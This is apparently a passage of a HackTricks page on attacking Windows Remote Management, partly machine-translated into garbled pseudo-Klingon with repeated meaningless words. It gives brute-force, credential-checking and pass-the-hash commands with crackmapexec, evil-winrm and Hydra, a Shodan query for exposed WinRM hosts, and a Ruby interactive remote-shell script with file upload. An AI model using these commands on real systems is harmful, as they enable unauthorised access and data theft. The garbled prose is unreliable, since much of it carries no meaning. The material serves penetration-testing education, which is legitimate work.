Enter-PSSession -Session $sess1
DaH jImej Invoke-Command lo'wI' DaH jImej'e'. jatlh: Invoke-Command
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
Qagh
Qagh 'oH 'e' vItlhutlh:
enter-pssession : 10.10.10.175 remote server 'e' vItlhutlh: The WinRM client cannot process the request. authentication scheme Kerberos vItlhutlh, 'ej client computer 'e' vItlhutlh, 'ach HTTPS transport vItlhutlh 'ej destination machine TrustedHosts configuration setting vItlhutlh. winrm.cmd vItlhutlh TrustedHosts. computers TrustedHosts list authenticated vItlhutlh. 'ej vItlhutlh 'e' vItlhutlh: winrm help config command run vItlhutlh. more information, about_Remote_Troubleshooting Help topic vItlhutlh.
The try on the client (info from here):
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
HackenProof Discord server jImejDI' experienced hackers je bug bounty hunters vItlhutlh!
Hacking Insights
vItlhutlh content vItlhutlh thrill je challenges hacking
Real-Time Hack News
vItlhutlh up-to-date with fast-paced hacking world through real-time news je insights
Latest Announcements
vItlhutlh informed with newest bug bounties launching je crucial platform updates
Join us on Discord je start collaborating with top hackers today!
WinRM connection in linux
Brute Force
Be careful, brute-forcing winrm could block users.
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
Using evil-winrm
Qapla'! (Introduction)
evil-winrm is a powerful tool that allows you to perform remote command execution on Windows machines using the WinRM (Windows Remote Management) protocol. It is a command-line tool that provides a simple and efficient way to interact with Windows systems over the network.
tlhIngan Hol (Installation)
To install evil-winrm, you can use the following command:
gem install evil-winrm
Qapla'! (Usage)
Once evil-winrm is installed, you can use it to connect to a remote Windows machine by specifying the target IP address, username, and password. Here is the basic syntax:
evil-winrm -i <target_ip> -u <username> -p <password>
Qapla'! (Authentication)
evil-winrm supports both password-based and certificate-based authentication. By default, it will attempt to authenticate using the provided username and password. However, if you have a certificate file, you can specify it using the -c option:
evil-winrm -i <target_ip> -u <username> -p <password> -c <certificate_file>
Qapla'! (Command Execution)
Once you are connected to a remote Windows machine using evil-winrm, you can execute commands on the target system. Simply type the desired command and press Enter. For example:
C:\> whoami
Qapla'! (File Upload)
evil-winrm also allows you to upload files to the remote Windows machine. You can use the -s option followed by the source file path and the destination path on the target system. Here is an example:
evil-winrm -i <target_ip> -u <username> -p <password> -s <source_file> <destination_path>
Qapla'! (File Download)
Similarly, you can download files from the remote Windows machine using evil-winrm. Use the -g option followed by the source file path on the target system and the destination path on your local machine. Here is an example:
evil-winrm -i <target_ip> -u <username> -p <password> -g <source_file> <destination_path>
Qapla'! (Conclusion)
evil-winrm is a valuable tool for pentesters and system administrators who need to perform remote command execution on Windows machines. It provides a straightforward and efficient way to interact with Windows systems over the network. With its various features, such as authentication, command execution, file upload, and file download, evil-winrm is a must-have tool in your hacking arsenal. So, give it a try and conquer the Windows realm!
gem install evil-winrm
QaD documentation vItlhutlh: https://github.com/Hackplayers/evil-winrm Daq vItlhutlh.
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
To use evil-winrm to connect to an IPv6 address create an entry inside /etc/hosts setting a domain name to the IPv6 address and connect to that domain.
Pass the hash with evil-winrm
Klingon Translation:
evil-winrm-ghItlh
IPv6 address-Daq evil-winrm-ghItlh chel-e' /etc/hosts-Daq ghItlh-e' domain name-e' chel-e' IPv6 address-e' ghItlh-e' connect-e' chel-e' domain-e' ghItlh-e' connect-e' chel-e'.
Pass the hash with evil-winrm
evil-winrm -u <username> -H <Hash> -i <IP>
PS-docker machine vIqaw'a' 'e' vItlhutlh.
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
ruby script jImej
Code extracted from here: https://alamot.github.io/winrm_shell/
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/
conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
)
class String
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end
command=""
file_manager = WinRM::FS::FileManager.new(conn)
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end
Shodan
port:5985 Microsoft-HTTPAPI
References
HackTricks Automatic Commands
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’
https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory or -s to upload scripts (sherlock)
menu
invoke-binary `tab`
#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))
https://book.hacktricks.xyz/pentesting/pentesting-winrm
Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
HackenProof Discord server jImejDaq experienced hackers je bug bounty hunters vItlhutlh!
Hacking Insights
Hacking vItlhutlh je challenges vItlhutlh content vItlhutlh engage
Real-Time Hack News
Real-time news je insights vItlhutlh hacking vItlhutlh keep up-to-date
Latest Announcements
Newest bug bounties je crucial platform updates vItlhutlh stay informed
Discord join je top hackers vItlhutlh collaborate vItlhutlh start today!
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks je HackTricks Cloud github repos.